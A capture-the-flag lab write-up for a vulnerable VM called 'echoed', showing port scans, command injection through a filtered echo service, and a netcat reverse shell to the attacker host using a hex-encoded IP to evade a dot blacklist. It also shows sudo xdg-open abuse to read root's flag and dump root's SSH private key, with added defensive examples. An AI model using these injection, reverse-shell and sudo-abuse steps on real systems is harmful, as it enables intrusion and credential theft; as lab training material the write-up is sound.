Difficulty: medium

Kali: 192.168.1.101

Target: 192.168.1.110

root@kali2 [~] ➜  arp-scan -l    [23:36:57]
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.1.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     78:60:5b:04:b4:8c       TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.104   44:e5:17:0a:27:01       Intel Corporate
192.168.1.110   08:00:27:5f:d3:ff       PCS Systemtechnik GmbH

Port scan

root@kali2 [~] ➜  nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.110    [23:37:08]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 23:37 CST
Nmap scan report for 192.168.1.110
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
4444/tcp open  krb524
MAC Address: 08:00:27:5F:D3:FF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
root@kali2 [~] ➜  clear    [23:37:46]
root@kali2 [~] ➜  nmap -sV -A 192.168.1.110 -p22,80,4444    [23:37:50]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 23:38 CST
Nmap scan report for 192.168.1.110
Host is up (0.0041s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 de:3a:50:8e:5d:21:09:7e:40:3f:b2:07:bb:41:08:7e (RSA)
|   256 5c:57:56:da:e5:1c:3e:bc:9a:a2:8d:6d:21:4e:bc:f9 (ECDSA)
|_  256 f8:aa:dc:d3:27:52:e3:99:32:98:45:5b:52:f0:bc:e1 (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
4444/tcp open  krb524?
| fingerprint-strings:
|   GetRequest:
|     Command:Found illegal char.Command:
|   NULL:
|_    Command:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.94SVN%I=7%D=8/17%Time=66C0C3E1%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"Command:")%r(GetRequest,23,"Command:Found\x20illegal\x20char\.
SF:Command:");
MAC Address: 08:00:27:5F:D3:FF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.09 ms 192.168.1.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.37 seconds

Command execution to get a shell

[screenshot]
The hint says to use port 4444.
[screenshot]
Reboot the target VM once.

root@kali2 [~/Desktop] ➜  nc 192.168.1.110 4444    [0:00:40]
Command:ls
Found illegal char.Command:

This is a bit CTF-style: some characters are filtered.

Executing:echo "a"
a
Command:a
Executing:echo "a"
a
Command:b
Executing:echo "b"
b
Command:c
Executing:echo "c"
c
Command:d
Found illegal char.Command:e
Executing:echo "e"
e

It appears to be running echo on whatever character we send.

Command:`ss`
Executing:echo "`ss`"
Netid State Recv-Q Send-Q                   Local Address:Port     Peer Address:Port                                                                            
u_str ESTAB 0      0                                    * 12622               * 12623                                                                           
u_str ESTAB 0      0                                    * 12682               * 12683                                                                           
u_str ESTAB 0      0                                    * 12803               * 12804                                                                           
u_str ESTAB 0      0      /var/run/dbus/system_bus_socket 12854               * 12543                                                                           
u_str ESTAB 0      0                                    * 12852               * 12853                                                                           
u_str ESTAB 0      0                                    * 12543               * 12854                                                                           
u_str ESTAB 0      0                                    * 12853               * 12852                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 12683               * 12682                                                                           
u_str ESTAB 0      0                                    * 13469               * 13470                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 12623               * 12622                                                                           
u_str ESTAB 0      0                                    * 12552               * 12855                                                                           
u_str ESTAB 0      0                                    * 13470               * 13469                                                                           
u_str ESTAB 0      0      /var/run/dbus/system_bus_socket 13075               * 13074                                                                           
u_str ESTAB 0      0                                    * 10998               * 11095                                                                           
u_str ESTAB 0      0                                    * 11525               * 11526                                                                           
u_str ESTAB 0      0                                    * 13074               * 13075                                                                           
u_str ESTAB 0      0      /var/run/dbus/system_bus_socket 12855               * 12552                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 12804               * 12803                                                                           
u_str ESTAB 0      0                                    * 13275               * 13276                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 13276               * 13275                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 11095               * 10998                                                                           
u_str ESTAB 0      0          /run/systemd/journal/stdout 11526               * 11525                                                                           
tcp   ESTAB 0      0                        192.168.1.110:4444    192.168.1.101:58726  

Testing confirms that command execution is possible.

Command:nc        
Executing:echo "nc"
nc
Command:-e
Executing:echo "-e"
-e
Command:/bin/bash
Executing:echo "/bin/bash"
/bin/bash

I want a reverse shell. Only the dot is filtered, so writing the IP address in hexadecimal or decimal gets past that check.

Command:`nc -e /bin/bash 0xC0A80165 4567`
root@kali2 [~/Desktop] ➜  nc -lnvp 4567    [0:30:05]
listening on [any] 4567 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.110] 46302
id
uid=1000(charlie) gid=1000(charlie) groups=1000(charlie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Got a shell.
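The dot filter above only blocks one spelling of an address. Classic inet_aton() parsers also accept a single 32-bit number in hex, octal or decimal, and short forms such as a.b.c. The following is an added example (not part of the original write-up, and not code from the box) that canonicalises every one of those spellings to dotted-quad form, so that an outbound-connection log or a captured command line can be compared against a normal blocklist. The `obfuscated_addresses` helper and its 2**24 threshold for plain decimal numbers are assumptions of this example, chosen so that port numbers and small counts are not flagged as addresses.

```python
# Added example, not part of the original write-up: canonicalise the IPv4
# spellings that a "no dots" blacklist lets through, so outbound-connection
# logs and command lines can be matched against a dotted-quad blocklist.
import re

# One address component: hex (0x...), octal (leading 0) or plain decimal.
_COMPONENT = re.compile(r'0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*')


def _parse_component(part: str) -> int:
    if not _COMPONENT.fullmatch(part):
        raise ValueError(f'bad component {part!r}')
    if part[:2].lower() == '0x':
        return int(part, 16)
    if part.startswith('0'):
        return int(part, 8)
    return int(part)


def normalize_ipv4(text: str) -> str:
    """Dotted-quad form of every spelling the classic inet_aton() accepts:
    a.b.c.d, a.b.c (c is 16 bits), a.b (b is 24 bits) and a (32 bits), each
    component in decimal, octal (leading 0) or hex (0x). ValueError otherwise."""
    parts = text.strip().split('.')
    widths = {1: (32,), 2: (8, 24), 3: (8, 8, 16), 4: (8, 8, 8, 8)}.get(len(parts))
    if widths is None:
        raise ValueError(f'too many components in {text!r}')
    addr = 0
    for part, width in zip(parts, widths):
        value = _parse_component(part)
        if value >= 1 << width:
            raise ValueError(f'component {part!r} exceeds {width} bits')
        addr = (addr << width) | value
    return '.'.join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def obfuscated_addresses(argv):
    """Map each dot-free token that decodes to an IPv4 address to its dotted
    form. Plain decimal numbers below 2**24 are skipped as a heuristic
    (assumption of this example): they are far more likely ports or counts."""
    found = {}
    for token in argv:
        if '.' in token:
            continue  # dotted forms are already what a blocklist expects
        try:
            dotted = normalize_ipv4(token)
        except ValueError:
            continue
        if token.isdigit() and not token.startswith('0') and int(token) < 1 << 24:
            continue
        found[token] = dotted
    return found


if __name__ == '__main__':
    # Constructed sample, modelled on the command line used in the write-up.
    print(obfuscated_addresses('nc -e /bin/bash 0xC0A80165 4567'.split()))
```

Run stand-alone it prints `{'0xC0A80165': '192.168.1.101'}`; the same normalisation is what an egress filter or a log parser should apply before deciding whether a destination is on a list.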

Privilege escalation

charlie@echoed:~$ cat flag.sh 
#!/bin/bash
echo '\033[0;35m
                                   .     **                                     
                                *           *.                                  
                                              ,*                                
                                                 *,                             
                         ,                         ,*                           
                      .,                              *,                        
                    /                                    *                      
                 ,*                                        *,                   
               /.                                            .*.                
             *                                                  **              
             ,*                                               ,*                
                **                                          *.                  
                   **                                    **.                    
                     ,*                                **                       
                        *,                          ,*                          
                           *                      **                            
                             *,                .*                               
                                *.           **                                 
                                  **      ,*,                                   
                                     ** *,     \033[0m'                                               



echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
charlie@echoed:~$ ls -al flag.sh 
-rwxr-xr-x 1 charlie charlie 1920 Dec 16  2020 flag.sh

We only have charlie's privileges, so only the user flag can be read.

charlie@echoed:~$ cat listener.py 
#!/usr/bin/env python
import os
import socket
import subprocess

HOST = '0.0.0.0'
PORT = 4444
allow_reuse_address = True
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(100)
conn, addr = s.accept()
while True:
        try:
                conn.send("Command:")
                comando = conn.recv(1024)
                comando = comando.strip()
                comando2 = 'echo "' + comando + '"'
                command = 'Executing:' + comando2 + '\n'
                print ("\n")
                chars = set('d\fgjkl?mopqrtuv*,._')
                if any((c in chars) for c in comando):
                        conn.send('Found illegal char.')
                else:
                        output = subprocess.check_output(comando2, shell=True)
                        conn.send(command)
                        conn.send(output)
        except:
                continue

I'll save this script and give it to the kids to play with later.
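Two things in listener.py explain the session above. It calls `s.accept()` exactly once, so it serves a single client for its lifetime (which is why the box was rebooted after the nmap probes). And its defence is a character blacklist applied before the input is spliced into `echo "..."` and run with `shell=True`: backtick, `$`, `(`, `)`, `;`, `|` and every uppercase letter are not in the set, so shell syntax passes the check untouched. The following added example (not code from the original write-up or from the box) puts that check next to a handler that does the same job with no shell at all. The names `vulnerable_echo`, `hardened_echo`, `listener_response` and the `CANARY` variable are constructed for this demonstration.

```python
# Added example, not code from the original write-up or from the box:
# listener.py's character blacklist next to a handler that does not need one.
import subprocess

# Exact blacklist from listener.py: some lowercase letters, a few punctuation
# characters and form feed (\f). Backtick, $, (, ), ;, | and every uppercase
# letter are absent, so shell syntax passes the check untouched.
ILLEGAL = set('d\fgjkl?mopqrtuv*,._')


def is_blocked(cmd: str) -> bool:
    """listener.py's check: reject the input if any character is blacklisted."""
    return any(c in ILLEGAL for c in cmd)


def vulnerable_echo(cmd: str, env=None) -> str:
    """What listener.py does after the check: the input is spliced into a shell
    command line, so anything the shell expands inside double quotes
    (`...`, $(...), $VAR) is evaluated before echo receives its argument."""
    return subprocess.check_output('echo "' + cmd + '"', shell=True,
                                   text=True, env=env)


def hardened_echo(cmd: str) -> str:
    """Same visible behaviour with no shell involved: argv is a list, so the
    input is one literal argument. printf is used rather than echo so that an
    input such as '-e' or '-n' is printed instead of being parsed as an option."""
    return subprocess.check_output(['printf', '%s\n', cmd], text=True)


def listener_response(cmd: str, env=None) -> str:
    """The original flow: blacklist, then shell. Kept here to show that the
    filter and the bug are independent; the fix is hardened_echo, not a longer
    blacklist."""
    cmd = cmd.strip()
    if is_blocked(cmd):
        return 'Found illegal char.'
    return 'Executing:echo "' + cmd + '"\n' + vulnerable_echo(cmd, env)


if __name__ == '__main__':
    # CANARY is an environment variable constructed for the demonstration; it
    # passes the blacklist because uppercase letters and $ are never checked.
    demo_env = {'CANARY': 'expanded by the shell', 'PATH': '/usr/bin:/bin'}
    for probe in ['ss', 'id', '$CANARY']:
        print(repr(probe), 'blocked' if is_blocked(probe) else 'allowed')
    print(listener_response('$CANARY', demo_env), end='')
    print(hardened_echo('$CANARY'), end='')
```

The lesson is the usual one for `shell=True`: a blacklist on the data cannot keep it out of the shell's grammar, whereas an argv list never hands the data to a shell in the first place, so there is nothing left to filter.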

charlie@echoed:~$ sudo -l
Matching Defaults entries for charlie on echoed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on echoed:
    (ALL : ALL) NOPASSWD: /usr/bin/xdg-open
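A NOPASSWD rule for a program that opens files with a configurable handler is worth catching before someone else does. The following added example (not part of the original write-up) parses `sudo -l` output in the format printed above and flags NOPASSWD rules whose executable is not on an explicit approved list. The sample input is the write-up's own `sudo -l` output; the rule-parsing regexes and the `approved` set are assumptions of this example.

```python
# Added example, not part of the original write-up: parse `sudo -l` output as
# printed above and flag NOPASSWD rules whose target is not explicitly approved.
import re

# Constructed sample: the sudo -l output shown in the write-up, verbatim.
SUDO_L_OUTPUT = """\
Matching Defaults entries for charlie on echoed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User charlie may run the following commands on echoed:
    (ALL : ALL) NOPASSWD: /usr/bin/xdg-open
"""

_USER_RE = re.compile(r'^User (\S+) may run the following commands on (\S+):')
# "(runas) TAG: TAG: cmd1, cmd2" -- tags such as NOPASSWD or SETENV are optional.
_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(output: str):
    """Return one dict per command in the 'may run the following commands' block."""
    rules, user, host = [], None, None
    for line in output.splitlines():
        m = _USER_RE.match(line)
        if m:
            user, host = m.groups()
            continue
        if user is None or not line.strip():
            continue  # still in the Defaults section, or a blank line
        m = _RULE_RE.match(line)
        if not m:
            continue
        tags = re.findall(r'[A-Z]+', m.group('tags'))
        for cmd in m.group('cmds').split(', '):
            rules.append({'user': user, 'host': host,
                          'runas': m.group('runas').strip(),
                          'tags': tags, 'command': cmd.strip()})
    return rules


def risky_rules(rules, approved=frozenset()):
    """NOPASSWD rules whose executable is not on the approved list. A program
    that hands a file to whatever handler is configured (xdg-open passed
    /root/root.txt to a pager on this box) is an arbitrary file read as root."""
    return [r for r in rules
            if 'NOPASSWD' in r['tags'] and r['command'].split()[0] not in approved]


if __name__ == '__main__':
    for rule in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{rule['user']}@{rule['host']}: ({rule['runas']}) "
              f"{' '.join(rule['tags'])} {rule['command']}")
```

Run against the sample it reports the single rule above; fed the output of `sudo -l` across a fleet, the same function gives a list of passwordless rules to review one by one rather than a file to eyeball.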

A quick search shows this command opens a file or image with the default application, so I used it to read the root flag directly.

charlie@echoed:~$ sudo xdg-open /root/root.txt
WARNING: terminal is not fully functional
/root/root.txt  (press RETURN)HMVcharlied
/root/root.txt (END)(END)(END)(END)(END)(END)(END)(END)

Got the root flag, but not a root shell.
Let's read root's private key.

charlie@echoed:~$ sudo xdg-open /root/.ssh/id_rsa
WARNING: terminal is not fully functional
/root/.ssh/id_rsa  (press RETURN)-----BEGIN OPENSSH PRIVATE KEY-----
[key body as rendered by the pager, omitted here]
:hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
:eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==

It is there; let's tidy up the formatting.

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7EqTEqxQiI+A27hayef+XQLgE91eQQ94tyvsEFWvQiLtSUwHhCKn
TXARwWcCc5uWFhMTAqL8mFncfYLYvRG2PhiasUgi+kIVjWQZPp/CAu/AMQCeELd2giWoz/
w4xuiz/jVkUiZtB4OUfGFbwkMFi5wqRM5d6TIGUQinfGiwiutWSusQ7cpxLgbtGGuuJe5Z
BOXYk4WDZfV+o8DiqTn/DSyADeQoyTYO6qfkcFN2lgVlGdEYx7CF5MS+DT/+b5dBpQGcTj
jDj+KLckJkt7GZ0fbhpzToiBETTBBDqzgeeN04QmAOlOubbcIwnB33+PEaWFtQMatGZQYC
ks9KBQv+lQAAA8hYRFboWERW6AAAAAdzc2gtcnNhAAABAQDsSpMSrFCIj4DbuFrJ5/5dAu
AT3V5BD3i3K+wQVa9CIu1JTAeEIqdNcBHBZwJzm5YWExMCovyYWdx9gti9EbY+GJqxSCL6
QhWNZBk+n8IC78AxAJ4Qt3aCJajP/DjG6LP+NWRSJm0Hg5R8YVvCQwWLnCpEzl3pMgZRCK
d8aLCK61ZK6xDtynEuBu0Ya64l7lkE5diThYNl9X6jwOKpOf8NLIAN5CjJNg7qp+RwU3aW
BWUZ0RjHsIXkxL4NP/5vl0GlAZxOOMOP4otyQmS3sZnR9uGnNOiIERNMEEOrOB543ThCYA
6U65ttwjCcHff48RpYW1Axq0ZlBgKSz0oFC/6VAAAAAwEAAQAAAQEAzdQoSRvRCyP2G297
pmVwLZVTm/o5IHNZtDWObKw2/mVuTWrtIS0Oj2YQEWipugrNsmzrImDXp96fMrXIFupW1c
CY/9TWoyjtnTyUwPhpCCXQRN9E0Ur+8F/drU8IJjyOjeH0gZr3XpQ/xBkK1S2MpxBhwY4C
QCBTYEMpojWPk3HAMbQNFddsPAPfLFk+4R6GPUKrUtOzzf/Kdwpn+PTFRjvytPfS7pbPAx
YHyM42rSNhy6jQlN1Iiu+EwUm1MBl9bTk5A6Jk3fvQWnBXoPZfjbgE/Kk2RZXZNW1a6MBG
URR5zjhWfu0NvJDm8z227UgwV7fXsUMyvBbeYFJHOuygAQAAAIEA6Inpgcu76BJkYcgTJD
PEwbtyyc/PE9vFYIwBENuUlz6jXT1TuhZ1FyY+pidQ607l0E+M7zwGrMb+PQP8l7KpMkbX
Y8IQydqs/XzNziO9RnQusXFcVCbsAKmYsLeCkbzOn4yWitA5cpgLs/bXrqGs2dFE/d8ifi
mLodRZj6/vLGwAAACBAPlu5m8XoaGK1XkF7Vlik4YoCNPnavRGB91fJg/M7M5YKKR7Y1ll
jmNX4TIIj+U5CuvIBf6TVS1fwn95ANv2o8oxVG7e4AHZpt3GQtP2yDLiHshzsj0W6NzzeI
dB2BClQgvukjzremccz8rHV3L9nYr1LYF/Rs6GgvsD72AZzgNJAAAAgQDygxopioQQ/Dup
z6hTWng1LXgZ0EUBMqN5tCcGgTHvAeykiWpjl/zrK5QjDmjhKzYaHPBI/sUdgVA8o2R8ne
hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
root@kali2 [~/Desktop] ➜  vim id_rsa    [0:54:10]
root@kali2 [~/Desktop] ➜  chmod 600 id_rsa    [0:54:16]
root@kali2 [~/Desktop] ➜  ssh -i id_rsa root@192.168.1.110    [0:54:22]
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
ED25519 key fingerprint is SHA256:oQu3q+1PdKxh+LYJGhUzk9Xi5XkHM5TN+iho+LIwgPo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.1.110' (ED25519) to the list of known hosts.
Linux echoed 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 17 02:25:52 2020
root@echoed:~# id
uid=0(root) gid=0(root) groups=0(root

Got a root shell.